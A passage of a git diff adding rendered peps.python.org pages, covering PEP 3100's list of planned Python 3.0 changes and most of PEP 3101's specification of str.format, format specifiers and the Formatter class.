Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3100/index.html b/pep-3100/index.html new file mode 100644 index 00000000000..4400853ddf7 --- /dev/null +++ b/pep-3100/index.html @@ -0,0 +1,570 @@ + + + + + + + + PEP 3100 – Miscellaneous Python 3.0 Plans | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3100 – Miscellaneous Python 3.0 Plans

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
20-Aug-2004
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP, previously known as PEP 3000, describes smaller scale changes +and new features for which no separate PEP is written yet, all targeted +for Python 3000.

+

The list of features included in this document is subject to change +and isn’t binding on the Python development community; features may be +added, removed, and modified at any time. The purpose of this list is +to focus our language development effort on changes that are steps to +3.0, and to encourage people to invent ways to smooth the transition.

+

This document is not a wish-list that anyone can extend. While there +are two authors of this PEP, we’re just supplying the text; the +decisions for which changes are listed in this document are made by +Guido van Rossum, who has chosen them as goals for Python 3.0.

+

Guido’s pronouncements on things that will not change in Python 3.0 +are recorded in PEP 3099.

+
+
+

General goals

+

A general goal is to reduce feature duplication by removing old ways +of doing things. A general principle of the design will be that one +obvious way of doing something is enough. [1]

+
+
+

Influencing PEPs

+
    +
  • PEP 238 (Changing the Division Operator)
  • +
  • PEP 328 (Imports: Multi-Line and Absolute/Relative)
  • +
  • PEP 343 (The “with” Statement)
  • +
  • PEP 352 (Required Superclass for Exceptions)
  • +
+
+
+

Style changes

+
    +
  • The C style guide will be updated to use 4-space indents, never tabs. +This style should be used for all new files; existing files can be +updated only if there is no hope to ever merge a particular file from +the Python 2 HEAD. Within a file, the indentation style should be +consistent. No other style guide changes are planned ATM.
  • +
+
+
+

Core language

+
    +
  • True division becomes default behavior PEP 238 [done]
  • +
  • exec as a statement is not worth it – make it a function [done]
  • +
  • Add optional declarations for static typing PEP 3107 [10] [done]
  • +
  • Support only new-style classes; classic classes will be gone [1] [done]
  • +
  • Replace print by a function [14] PEP 3105 [done]
  • +
  • The softspace attribute of files goes away. [done]
  • +
  • Use except E1, E2, E3 as err: if you want the error variable. [3] [done]
  • +
  • None becomes a keyword [4]; also True and False [done]
  • +
  • ... to become a general expression element [16] [done]
  • +
  • as becomes a keyword [5] (starting in 2.6 already) [done]
  • +
  • Have list comprehensions be syntactic sugar for passing an +equivalent generator expression to list(); as a consequence the +loop variable will no longer be exposed PEP 289 [done]
  • +
  • Comparisons other than == and != between disparate types +will raise an exception unless explicitly supported by the type [6] [done]
  • +
  • floats will not be acceptable as arguments in place of ints for operations +where floats are inadvertently accepted (PyArg_ParseTuple() i & l formats)
  • +
  • Remove from … import * at function scope. [done] This means that functions +can always be optimized and support for unoptimized functions can go away.
  • +
  • +
    Imports PEP 328
      +
    • Imports will be absolute by default. [done]
    • +
    • Relative imports must be explicitly specified. [done]
    • +
    • Indirection entries in sys.modules (i.e., a value of None for +A.string means to use the top-level string module) will not be +supported.
    • +
    +
    +
    +
  • +
  • __init__.py might become optional in sub-packages? __init__.py will still +be required for top-level packages.
  • +
  • Cleanup the Py_InitModule() variants {,3,4} (also import and parser APIs)
  • +
  • Cleanup the APIs exported in pythonrun, etc.
  • +
  • Some expressions will require parentheses that didn’t in 2.x:
      +
    • List comprehensions will require parentheses around the iterables. +This will make list comprehensions more similar to generator comprehensions. +[x for x in 1, 2] will need to be: [x for x in (1, 2)] [done]
    • +
    • Lambdas may have to be parenthesized PEP 308 [NO]
    • +
    +
  • +
  • In order to get rid of the confusion between __builtin__ and __builtins__, +it was decided to rename __builtin__ (the module) to builtins, and to leave +__builtins__ (the sandbox hook) alone. [33] [34] [done]
  • +
  • Attributes on functions of the form func_whatever will be renamed +__whatever__ [17] [done]
  • +
  • Set literals and comprehensions [19] [20] [done] +{x} means set([x]); {x, y} means set([x, y]). +{F(x) for x in S if P(x)} means set(F(x) for x in S if P(x)). +NB. {range(x)} means set([range(x)]), NOT set(range(x)). +There’s no literal for an empty set; use set() (or {1}&{2} :-). +There’s no frozenset literal; they are too rarely needed.
  • +
  • The __nonzero__ special method will be renamed to __bool__ +and have to return a bool. The typeobject slot will be called +tp_bool [23] [done]
  • +
  • Dict comprehensions, as first proposed in PEP 274 [done] +{K(x): V(x) for x in S if P(x)} means dict((K(x), V(x)) for x in S if P(x)).
  • +
+

To be removed:

+
    +
  • String exceptions: use instances of an Exception class [2] [done]
  • +
  • raise Exception, "message": use raise Exception("message") [12] +[done]
  • +
  • x: use repr(x) [2] [done]
  • +
  • The <> operator: use != instead [3] [done]
  • +
  • The __mod__ and __divmod__ special methods on float. [they should stay] [21]
  • +
  • Drop unbound methods [7] [26] [done]
  • +
  • METH_OLDARGS [done]
  • +
  • WITH_CYCLE_GC [done]
  • +
  • __getslice__, __setslice__, __delslice__ [32]; +remove slice opcodes and use slice objects. [done]
  • +
  • __oct__, __hex__: use __index__ in oct() and hex() +instead. [done]
  • +
  • __methods__ and __members__ [done]
  • +
  • C APIs (see code): +PyFloat_AsString, PyFloat_AsReprString, PyFloat_AsStringEx, +PySequence_In, PyEval_EvalFrame, PyEval_CallObject, +_PyObject_Del, _PyObject_GC_Del, _PyObject_GC_Track, _PyObject_GC_UnTrack +PyString_AsEncodedString, PyString_AsDecodedString +PyArg_NoArgs, PyArg_GetInt, intargfunc, intintargfunc

    PyImport_ReloadModule ?

    +
  • +
+
+
+

Atomic Types

+
    +
  • Remove distinction between int and long types; ‘long’ built-in type and +literals with ‘L’ or ‘l’ suffix disappear [1] [done]
  • +
  • Make all strings be Unicode, and have a separate bytes() type [1] +The new string type will be called ‘str’. See PEP 3137. [done]
  • +
  • Return iterable views instead of lists where appropriate for atomic +type methods (e.g. dict.keys(), dict.values(), +dict.items(), etc.); iter* methods will be removed. [done]
  • +
  • Make string.join() stringify its arguments? [18] [NO]
  • +
  • Fix open() so it returns a ValueError if the mode is bad rather than IOError. +[done]
  • +
+

To be removed:

+
    +
  • basestring.find() and basestring.rfind(); use basestring.index() +or basestring.[r]partition() or +basestring.rindex() in a try/except block??? [13] [UNLIKELY]
  • +
  • file.xreadlines() method [31] [done]
  • +
  • dict.setdefault()? [15] [UNLIKELY]
  • +
  • dict.has_key() method; use in operator [done]
  • +
  • list.sort() and builtin.sorted() methods: eliminate cmp +parameter [27] [done]
  • +
+
+
+

Built-in Namespace

+
    +
  • Make built-ins return an iterator where appropriate (e.g. range(), +zip(), map(), filter(), etc.) [done]
  • +
  • Remove input() and rename raw_input() to input(). +If you need the old input(), use eval(input()). [done]
  • +
  • Introduce trunc(), which would call the __trunc__() method on its +argument; suggested use is for objects like float where calling __int__() +has data loss, but an integral representation is still desired? [8] [done]
  • +
  • Exception hierarchy changes PEP 352 [done]
  • +
  • Add a bin() function for a binary representation of integers [done]
  • +
+

To be removed:

+
    +
  • apply(): use f(*args, **kw) instead [2] [done]
  • +
  • buffer(): must die (use a bytes() type instead) (?) [2] [done]
  • +
  • callable(): just use isinstance(x, collections.Callable) (?) [2] [done]
  • +
  • compile(): put in sys (or perhaps in a module of its own) [2]
  • +
  • coerce(): no longer needed [2] [done]
  • +
  • execfile(), reload(): use exec() [2] [done]
  • +
  • intern(): put in sys [2], [22] [done]
  • +
  • reduce(): put in functools, a loop is more readable most of the +times [2], [9] [done]
  • +
  • xrange(): use range() instead [1] [See range() above] [done]
  • +
  • +
    StandardError: this is a relic from the original exception hierarchy;
    subclass Exception instead. [done]
    +
    +
  • +
+
+
+

Standard library

+
    +
  • Reorganize the standard library to not be as shallow?
  • +
  • Move test code to where it belongs, there will be no more test() functions +in the standard library
  • +
  • Convert all tests to use either doctest or unittest.
  • +
  • For the procedures of standard library improvement, see PEP 3001
  • +
+

To be removed:

+
    +
  • The sets module. [done]
  • +
  • +
    stdlib modules to be removed
      +
    • +
      see docstrings and comments in the source
        +
      • macfs [to do]
      • +
      • new, reconvert, stringold, xmllib, +pcre, pypcre, strop [all done]
      • +
      +
      +
      +
    • +
    • +
      see PEP 4
        +
      • buildtools, +mimetools, +multifile, +rfc822, +[to do]
      • +
      • mpz, posixfile, regsub, rgbimage, +sha, statcache, sv, TERMIOS, timing [done]
      • +
      • cfmfile, gopherlib, md5, MimeWriter, mimify [done]
      • +
      • cl, sets, xreadlines, rotor, whrandom [done]
      • +
      +
      +
      +
    • +
    • +
      Everything in lib-old PEP 4 [done]
        +
      • Para, addpack, cmp, cmpcache, codehack, +dircmp, dump, find, fmt, grep, +lockfile, newdir, ni, packmail, poly, +rand, statcache, tb, tzparse, util, +whatsound, whrandom, zmod
      • +
      +
      +
      +
    • +
    +
    +
    +
  • +
  • sys.exitfunc: use atexit module instead [28], +[35] [done]
  • +
  • sys.exc_type, sys.exc_values, sys.exc_traceback: +not thread-safe; use sys.exc_info() or an attribute +of the exception [2] [11] [28] [done]
  • +
  • sys.exc_clear: Python 3’s except statements provide the same +functionality [24] PEP 3110 [28] [done]
  • +
  • array.read, array.write [30]
  • +
  • operator.isCallable : callable() built-in is being removed +[29] [36] [done]
  • +
  • operator.sequenceIncludes : redundant thanks to +operator.contains [29] [36] [done]
  • +
  • In the thread module, the acquire_lock() and release_lock() aliases +for the acquire() and release() methods on lock objects. +(Probably also just remove the thread module as a public API, +in favor of always using threading.py.)
  • +
  • UserXyz classes, in favour of XyzMixins.
  • +
  • Remove the unreliable empty() and full() methods from Queue.py? [25]
  • +
  • Remove jumpahead() from the random API? [25]
  • +
  • Make the primitive for random be something generating random bytes +rather than random floats? [25]
  • +
  • Get rid of Cookie.SerialCookie and Cookie.SmartCookie? [25]
  • +
  • Modify the heapq.heapreplace() API to compare the new value to the top +of the heap? [25]
  • +
+
+
+

Outstanding Issues

+
    +
  • Require C99, so we can use // comments, named initializers, declare variables +without introducing a new scope, among other benefits. (Also better support +for IEEE floating point issues like NaN and infinities?)
  • +
  • Remove support for old systems, including: BeOS, RISCOS, (SGI) Irix, Tru64
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3100.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3101/index.html b/pep-3101/index.html new file mode 100644 index 00000000000..a7506c3c0af --- /dev/null +++ b/pep-3101/index.html @@ -0,0 +1,894 @@ + + + + + + + + PEP 3101 – Advanced String Formatting | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3101 – Advanced String Formatting

+
+
Author:
+
Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Apr-2006
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new system for built-in string formatting +operations, intended as a replacement for the existing ‘%’ string +formatting operator.

+
+
+

Rationale

+

Python currently provides two methods of string interpolation:

+
    +
  • The ‘%’ operator for strings. [1]
  • +
  • The string.Template module. [2]
  • +
+

The primary scope of this PEP concerns proposals for built-in +string formatting operations (in other words, methods of the +built-in string type).

+

The ‘%’ operator is primarily limited by the fact that it is a +binary operator, and therefore can take at most two arguments. +One of those arguments is already dedicated to the format string, +leaving all other variables to be squeezed into the remaining +argument. The current practice is to use either a dictionary or a +tuple as the second argument, but as many people have commented +[3], this lacks flexibility. The “all or nothing” approach +(meaning that one must choose between only positional arguments, +or only named arguments) is felt to be overly constraining.

+

While there is some overlap between this proposal and +string.Template, it is felt that each serves a distinct need, +and that one does not obviate the other. This proposal is for +a mechanism which, like ‘%’, is efficient for small strings +which are only used once, so, for example, compilation of a +string into a template is not contemplated in this proposal, +although the proposal does take care to define format strings +and the API in such a way that an efficient template package +could reuse the syntax and even some of the underlying +formatting code.

+
+
+

Specification

+

The specification will consist of the following parts:

+
    +
  • Specification of a new formatting method to be added to the +built-in string class.
  • +
  • Specification of functions and flag values to be added to +the string module, so that the underlying formatting engine +can be used with additional options.
  • +
  • Specification of a new syntax for format strings.
  • +
  • Specification of a new set of special methods to control the +formatting and conversion of objects.
  • +
  • Specification of an API for user-defined formatting classes.
  • +
  • Specification of how formatting errors are handled.
  • +
+

Note on string encodings: When discussing this PEP in the context +of Python 3.0, it is assumed that all strings are unicode strings, +and that the use of the word ‘string’ in the context of this +document will generally refer to a Python 3.0 string, which is +the same as Python 2.x unicode object.

+

In the context of Python 2.x, the use of the word ‘string’ in this +document refers to an object which may either be a regular string +or a unicode object. All of the function call interfaces +described in this PEP can be used for both strings and unicode +objects, and in all cases there is sufficient information +to be able to properly deduce the output string type (in +other words, there is no need for two separate APIs). +In all cases, the type of the format string dominates - that +is, the result of the conversion will always result in an object +that contains the same representation of characters as the +input format string.

+
+

String Methods

+

The built-in string class (and also the unicode class in 2.6) will +gain a new method, ‘format’, which takes an arbitrary number of +positional and keyword arguments:

+
"The story of {0}, {1}, and {c}".format(a, b, c=d)
+
+
+

Within a format string, each positional argument is identified +with a number, starting from zero, so in the above example, ‘a’ is +argument 0 and ‘b’ is argument 1. Each keyword argument is +identified by its keyword name, so in the above example, ‘c’ is +used to refer to the third argument.

+

There is also a global built-in function, ‘format’ which formats +a single value:

+
print(format(10.0, "7.3g"))
+
+
+

This function is described in a later section.

+
+
+

Format Strings

+

Format strings consist of intermingled character data and markup.

+

Character data is data which is transferred unchanged from the +format string to the output string; markup is not transferred from +the format string directly to the output, but instead is used to +define ‘replacement fields’ that describe to the format engine +what should be placed in the output string in place of the markup.

+

Brace characters (‘curly braces’) are used to indicate a +replacement field within the string:

+
"My name is {0}".format('Fred')
+
+
+

The result of this is the string:

+
"My name is Fred"
+
+
+

Braces can be escaped by doubling:

+
"My name is {0} :-{{}}".format('Fred')
+
+
+

Which would produce:

+
"My name is Fred :-{}"
+
+
+

The element within the braces is called a ‘field’. Fields consist +of a ‘field name’, which can either be simple or compound, and an +optional ‘format specifier’.

+
+
+

Simple and Compound Field Names

+

Simple field names are either names or numbers. If numbers, they +must be valid base-10 integers; if names, they must be valid +Python identifiers. A number is used to identify a positional +argument, while a name is used to identify a keyword argument.

+

A compound field name is a combination of multiple simple field +names in an expression:

+
"My name is {0.name}".format(open('out.txt', 'w'))
+
+
+

This example shows the use of the ‘getattr’ or ‘dot’ operator +in a field expression. The dot operator allows an attribute of +an input value to be specified as the field value.

+

Unlike some other programming languages, you cannot embed arbitrary expressions in format strings. This is by design - the types of expressions that you can use are deliberately limited. Only two operators are supported: the ‘.’ (getattr) operator, and the ‘[]’ (getitem) operator. The reason for allowing these operators is that they don’t normally have side effects in non-pathological code.

+

An example of the ‘getitem’ syntax:

+
"My name is {0[name]}".format(dict(name='Fred'))
+
+
+

It should be noted that the use of ‘getitem’ within a format string +is much more limited than its conventional usage. In the above example, +the string ‘name’ really is the literal string ‘name’, not a variable +named ‘name’. The rules for parsing an item key are very simple. +If it starts with a digit, then it is treated as a number, otherwise +it is used as a string.

+

Because keys are not quote-delimited, it is not possible to +specify arbitrary dictionary keys (e.g., the strings “10” or +“:-]”) from within a format string.

+

Implementation note: The implementation of this proposal is +not required to enforce the rule about a simple or dotted name +being a valid Python identifier. Instead, it will rely on the +getattr function of the underlying object to throw an exception if +the identifier is not legal. The str.format() function will have +a minimalist parser which only attempts to figure out when it is +“done” with an identifier (by finding a ‘.’ or a ‘]’, or ‘}’, +etc.).

+
+
+

Format Specifiers

+

Each field can also specify an optional set of ‘format +specifiers’ which can be used to adjust the format of that field. +Format specifiers follow the field name, with a colon (‘:’) +character separating the two:

+
"My name is {0:8}".format('Fred')
+
+
+

The meaning and syntax of the format specifiers depends on the +type of object that is being formatted, but there is a standard +set of format specifiers used for any object that does not +override them.

+

Format specifiers can themselves contain replacement fields. +For example, a field whose field width is itself a parameter +could be specified via:

+
"{0:{1}}".format(a, b)
+
+
+

These ‘internal’ replacement fields can only occur in the format +specifier part of the replacement field. Internal replacement fields +cannot themselves have format specifiers. This implies also that +replacement fields cannot be nested to arbitrary levels.

+

Note that the doubled ‘}’ at the end, which would normally be +escaped, is not escaped in this case. The reason is because +the ‘{{’ and ‘}}’ syntax for escapes is only applied when used +outside of a format field. Within a format field, the brace +characters always have their normal meaning.

+

The syntax for format specifiers is open-ended, since a class +can override the standard format specifiers. In such cases, +the str.format() method merely passes all of the characters between +the first colon and the matching brace to the relevant underlying +formatting method.

+
+
+

Standard Format Specifiers

+

If an object does not define its own format specifiers, a standard +set of format specifiers is used. These are similar in concept to +the format specifiers used by the existing ‘%’ operator, however +there are also a number of differences.

+

The general form of a standard format specifier is:

+
[[fill]align][sign][#][0][minimumwidth][.precision][type]
+
+
+

The brackets ([]) indicate an optional element.

+

The optional align flag can be one of the following:

+
'<' - Forces the field to be left-aligned within the available
+      space (This is the default.)
+'>' - Forces the field to be right-aligned within the
+      available space.
+'=' - Forces the padding to be placed after the sign (if any)
+      but before the digits.  This is used for printing fields
+      in the form '+000000120'. This alignment option is only
+      valid for numeric types.
+'^' - Forces the field to be centered within the available
+      space.
+
+
+

Note that unless a minimum field width is defined, the field +width will always be the same size as the data to fill it, so +that the alignment option has no meaning in this case.

+

The optional ‘fill’ character defines the character to be used to +pad the field to the minimum width. The fill character, if present, +must be followed by an alignment flag.

+
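A few examples to make the fill and alignment options concrete (hypothetical values; expected output in comments):

"{0:<8}".format('Fred')     # 'Fred    '  (left-aligned, the default)
"{0:>8}".format('Fred')     # '    Fred'  (right-aligned)
"{0:*^8}".format('Fred')    # '**Fred**'  (fill character '*', centered)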

The ‘sign’ option is only valid for numeric types, and can be one +of the following:

+
'+'  - indicates that a sign should be used for both
+       positive as well as negative numbers
+'-'  - indicates that a sign should be used only for negative
+       numbers (this is the default behavior)
+' '  - indicates that a leading space should be used on
+       positive numbers
+
+
+

If the ‘#’ character is present, integers use the ‘alternate form’ +for formatting. This means that binary, octal, and hexadecimal +output will be prefixed with ‘0b’, ‘0o’, and ‘0x’, respectively.

+

‘width’ (shown as ‘minimumwidth’ in the general form above) is a decimal integer defining the minimum field width. If not specified, then the field width will be determined by the content.

+

If the width field is preceded by a zero (‘0’) character, this enables +zero-padding. This is equivalent to an alignment type of ‘=’ and a +fill character of ‘0’.

+
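The equivalence can be illustrated as follows (expected output in comments):

"{0:08d}".format(120)      # '00000120'
"{0:0=8d}".format(120)     # '00000120'  (same: fill '0', '=' alignment)
"{0:+09d}".format(120)     # '+00000120' (padding goes after the sign)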

The ‘precision’ is a decimal number indicating how many digits should be displayed after the decimal point in a floating point conversion. For non-numeric types the precision indicates the maximum field size - in other words, how many characters will be used from the field content. The precision is ignored for integer conversions.

+
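For example (expected output in comments):

"{0:.2f}".format(3.14159)   # '3.14'  (two digits after the decimal point)
"{0:.3}".format('hello')    # 'hel'   (maximum field size for a string)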

Finally, the ‘type’ determines how the data should be presented.

+

The available integer presentation types are:

+
'b' - Binary. Outputs the number in base 2.
+'c' - Character. Converts the integer to the corresponding
+      Unicode character before printing.
+'d' - Decimal Integer. Outputs the number in base 10.
+'o' - Octal format. Outputs the number in base 8.
+'x' - Hex format. Outputs the number in base 16, using
+      lower-case letters for the digits above 9.
+'X' - Hex format. Outputs the number in base 16, using
+      upper-case letters for the digits above 9.
+'n' - Number. This is the same as 'd', except that it uses the
+      current locale setting to insert the appropriate
+      number separator characters.
+'' (None) - the same as 'd'
+
+
+
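A quick demonstration of these presentation types, including the ‘#’ alternate form described earlier (expected output in comments):

"{0:d} {0:b} {0:o} {0:x} {0:X}".format(42)   # '42 101010 52 2a 2A'
"{0:#b} {0:#o} {0:#x}".format(42)            # '0b101010 0o52 0x2a'
"{0:c}".format(97)                           # 'a' (Unicode code point 97)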

The available floating point presentation types are:

+
'e' - Exponent notation. Prints the number in scientific
+      notation using the letter 'e' to indicate the exponent.
+'E' - Exponent notation. Same as 'e' except it converts the
+      number to uppercase.
+'f' - Fixed point. Displays the number as a fixed-point
+      number.
+'F' - Fixed point. Same as 'f' except it converts the number
+      to uppercase.
+'g' - General format. This prints the number as a fixed-point
+      number, unless the number is too large, in which case
+      it switches to 'e' exponent notation.
+'G' - General format. Same as 'g' except switches to 'E'
+      if the number gets too large.
+'n' - Number. This is the same as 'g', except that it uses the
+      current locale setting to insert the appropriate
+      number separator characters.
+'%' - Percentage. Multiplies the number by 100 and displays
+      in fixed ('f') format, followed by a percent sign.
+'' (None) - similar to 'g', except that it prints at least one
+      digit after the decimal point.
+
+
+
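And similarly for the floating point presentation types (expected output in comments):

"{0:e}".format(12345.6789)    # '1.234568e+04'
"{0:f}".format(12345.6789)    # '12345.678900'
"{0:g}".format(12345.6789)    # '12345.7'
"{0:.1%}".format(0.25)        # '25.0%'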

Objects are able to define their own format specifiers to +replace the standard ones. An example is the ‘datetime’ class, +whose format specifiers might look something like the +arguments to the strftime() function:

+
"Today is: {0:%a %b %d %H:%M:%S %Y}".format(datetime.now())
+
+
+

For all built-in types, an empty format specification will produce +the equivalent of str(value). It is recommended that objects +defining their own format specifiers follow this convention as +well.

+
+
+

Explicit Conversion Flag

+

The explicit conversion flag is used to transform the format field value +before it is formatted. This can be used to override the type-specific +formatting behavior, and format the value as if it were a more +generic type. Currently, two explicit conversion flags are +recognized:

+
!r - convert the value to a string using repr().
+!s - convert the value to a string using str().
+
+
+

These flags are placed before the format specifier:

+
"{0!r:20}".format("Hello")
+
+
+

In the preceding example, the string “Hello” will be printed, with quotes, +in a field of at least 20 characters width.

+

A custom Formatter class can define additional conversion flags. +The built-in formatter will raise a ValueError if an invalid +conversion flag is specified.

+
+
+

Controlling Formatting on a Per-Type Basis

+

Each Python type can control formatting of its instances by defining +a __format__ method. The __format__ method is responsible for +interpreting the format specifier, formatting the value, and +returning the resulting string.

+

The new, global built-in function ‘format’ simply calls this special +method, similar to how len() and str() simply call their respective +special methods:

+
def format(value, format_spec):
+    return value.__format__(format_spec)
+
+
+

It is safe to call this function with a value of “None” (because the +“None” value in Python is an object and can have methods.)

+

Several built-in types, including ‘str’, ‘int’, ‘float’, and ‘object’ +define __format__ methods. This means that if you derive from any of +those types, your class will know how to format itself.

+

The object.__format__ method is the simplest: It simply converts the +object to a string, and then calls format again:

+
class object:
+    def __format__(self, format_spec):
+        return format(str(self), format_spec)
+
+
+

The __format__ methods for ‘int’ and ‘float’ will do numeric formatting +based on the format specifier. In some cases, these formatting +operations may be delegated to other types. So for example, in the case +where the ‘int’ formatter sees a format type of ‘f’ (meaning ‘float’) +it can simply cast the value to a float and call format() again.

+

Any class can override the __format__ method to provide custom +formatting for that type:

+
class AST:
+    def __format__(self, format_spec):
+        ...
+
+
+
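To make this concrete, here is a sketch of a hypothetical Money class; the ‘C’ format code is invented for this example, and any other specifier is delegated to the underlying float formatting:

class Money:
    def __init__(self, amount):
        self.amount = amount

    def __format__(self, format_spec):
        if format_spec == 'C':
            # Invented 'currency' code: two decimals and a dollar sign.
            return '$' + format(self.amount, '.2f')
        # Delegate anything else to the underlying float.
        return format(self.amount, format_spec)

"{0:C}".format(Money(1234.5))       # '$1234.50'
"{0:10.1f}".format(Money(1234.5))   # '    1234.5'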

Note for Python 2.x: The ‘format_spec’ argument will be either a string object or a unicode object, depending on the type of the original format string. The __format__ method should test the type of the ‘format_spec’ parameter to determine whether to return a string or unicode object. It is the responsibility of the __format__ method to return an object of the proper type.

+

Note that the ‘explicit conversion’ flag mentioned above is not passed +to the __format__ method. Rather, it is expected that the conversion +specified by the flag will be performed before calling __format__.

+
+
+

User-Defined Formatting

+

There will be times when customizing the formatting of fields +on a per-type basis is not enough. An example might be a +spreadsheet application, which displays hash marks ‘#’ when a value +is too large to fit in the available space.

+

For more powerful and flexible formatting, access to the underlying +format engine can be obtained through the ‘Formatter’ class that +lives in the ‘string’ module. This class takes additional options +which are not accessible via the normal str.format method.

+

An application can subclass the Formatter class to create its own +customized formatting behavior.

+

The PEP does not attempt to exactly specify all methods and +properties defined by the Formatter class; instead, those will be +defined and documented in the initial implementation. However, this +PEP will specify the general requirements for the Formatter class, +which are listed below.

+

Although str.format() does not directly use the Formatter class to do formatting, both use the same underlying implementation. The reason that str.format() does not use the Formatter class directly is because ‘str’ is a built-in type, which means that all of its methods must be implemented in C, whereas Formatter is a Python class. Formatter provides an extensible wrapper around the same C functions as are used by str.format().

+
+
+

Formatter Methods

+

The Formatter class takes no initialization arguments:

+
fmt = Formatter()
+
+
+

The public API methods of class Formatter are as follows:

+
-- format(format_string, *args, **kwargs)
+-- vformat(format_string, args, kwargs)
+
+
+

‘format’ is the primary API method. It takes a format template, +and an arbitrary set of positional and keyword arguments. +‘format’ is just a wrapper that calls ‘vformat’.

+

‘vformat’ is the function that does the actual work of formatting. It is exposed as a separate function for cases where you want to pass in a predefined dictionary of arguments, rather than unpacking and repacking the dictionary as individual arguments using the *args and **kwargs syntax. ‘vformat’ does the work of breaking up the format template string into character data and replacement fields. It calls the overridable methods ‘get_value’, ‘check_unused_args’ and ‘format_field’ as appropriate (described below).

+

Formatter defines the following overridable methods:

+
-- get_value(key, args, kwargs)
+-- check_unused_args(used_args, args, kwargs)
+-- format_field(value, format_spec)
+
+
+

‘get_value’ is used to retrieve a given field value. The ‘key’ argument +will be either an integer or a string. If it is an integer, it represents +the index of the positional argument in ‘args’; If it is a string, then +it represents a named argument in ‘kwargs’.

+

The ‘args’ parameter is set to the list of positional arguments to ‘vformat’, and the ‘kwargs’ parameter is set to the dictionary of keyword arguments.

+

For compound field names, these functions are only called for the +first component of the field name; subsequent components are handled +through normal attribute and indexing operations.

+

So for example, the field expression ‘0.name’ would cause ‘get_value’ +to be called with a ‘key’ argument of 0. The ‘name’ attribute will be +looked up after ‘get_value’ returns by calling the built-in ‘getattr’ +function.

+

If the index or keyword refers to an item that does not exist, then an +IndexError/KeyError should be raised.

+

‘check_unused_args’ is used to implement checking for unused arguments if desired. The arguments to this function are the set of all argument keys that were actually referred to in the format string (integers for positional arguments, and strings for named arguments), and a reference to the args and kwargs that were passed to vformat. The set of unused args can be calculated from these parameters. ‘check_unused_args’ is assumed to throw an exception if the check fails.

+
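As a sketch of how a subclass might use this hook (the StrictFormatter name and its policy are hypothetical), the following Formatter rejects keyword arguments that the format string never referenced:

from string import Formatter

class StrictFormatter(Formatter):
    def check_unused_args(self, used_args, args, kwargs):
        # 'used_args' holds every key the format string referred to.
        unused = set(kwargs) - set(used_args)
        if unused:
            raise ValueError('unused arguments: %s' % ', '.join(sorted(unused)))

fmt = StrictFormatter()
fmt.format("{name}", name='Fred')           # 'Fred'
# fmt.format("{name}", name='Fred', x=1)    # would raise ValueError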

‘format_field’ simply calls the global ‘format’ built-in. The method +is provided so that subclasses can override it.

+

To get a better understanding of how these functions relate to each +other, here is pseudocode that explains the general operation of +vformat:

+
def vformat(self, format_string, args, kwargs):
+
+  # Output buffer and set of used args
+  buffer = StringIO.StringIO()
+  used_args = set()
+
+  # Tokens are either format fields or literal strings
+  for token in self.parse(format_string):
+    if is_format_field(token):
+      # Split the token into field value and format spec
+      field_spec, _, format_spec = token.partition(":")
+
+      # Check for explicit type conversion
+      field_spec, _, explicit = field_spec.partition("!")
+
+      # 'first_part' is the part before the first '.' or '['
+      # Assume that 'get_first_part' returns either an int or
+      # a string, depending on the syntax.
+      first_part = get_first_part(field_spec)
+      value = self.get_value(first_part, args, kwargs)
+
+      # Record the fact that we used this arg
+      used_args.add(first_part)
+
+      # Handle [subfield] or .subfield. Assume that 'components'
+      # returns an iterator of the various subfields, not including
+      # the first part.
+      for comp in components(field_spec):
+        value = resolve_subfield(value, comp)
+
+      # Handle explicit type conversion
+      if explicit == 'r':
+        value = repr(value)
+      elif explicit == 's':
+        value = str(value)
+
+      # Call the global 'format' function and write out the converted
+      # value.
+      buffer.write(self.format_field(value, format_spec))
+
+    else:
+      buffer.write(token)
+
+  self.check_unused_args(used_args, args, kwargs)
+  return buffer.getvalue()
+
+
+

Note that the actual algorithm of the Formatter class (which will be +implemented in C) may not be the one presented here. (It’s likely +that the actual implementation won’t be a ‘class’ at all - rather, +vformat may just call a C function which accepts the other overridable +methods as arguments.) The primary purpose of this code example is to +illustrate the order in which overridable methods are called.

+
+
+

Customizing Formatters

+

This section describes some typical ways that Formatter objects +can be customized.

+

To support alternative format-string syntax, the ‘vformat’ method +can be overridden to alter the way format strings are parsed.

+

One common desire is to support a ‘default’ namespace, so that +you don’t need to pass in keyword arguments to the format() +method, but can instead use values in a pre-existing namespace. +This can easily be done by overriding get_value() as follows:

+
class NamespaceFormatter(Formatter):
+   def __init__(self, namespace={}):
+       Formatter.__init__(self)
+       self.namespace = namespace
+
+   def get_value(self, key, args, kwds):
+       if isinstance(key, str):
+           try:
+               # Check explicitly passed arguments first
+               return kwds[key]
+           except KeyError:
+               return self.namespace[key]
+       else:
+           return Formatter.get_value(self, key, args, kwds)
+
+
+

One can use this to easily create a formatting function that allows +access to global variables, for example:

+
fmt = NamespaceFormatter(globals())
+
+greeting = "hello"
+print(fmt.format("{greeting}, world!"))
+
+
+

A similar technique can be used with the locals() dictionary to gain access to local variables.

+

It would also be possible to create a ‘smart’ namespace formatter +that could automatically access both locals and globals through +snooping of the calling stack. Due to the need for compatibility +with the different versions of Python, such a capability will not +be included in the standard library, however it is anticipated +that someone will create and publish a recipe for doing this.

+

Another type of customization is to change the way that built-in +types are formatted by overriding the ‘format_field’ method. (For +non-built-in types, you can simply define a __format__ special +method on that type.) So for example, you could override the +formatting of numbers to output scientific notation when needed.

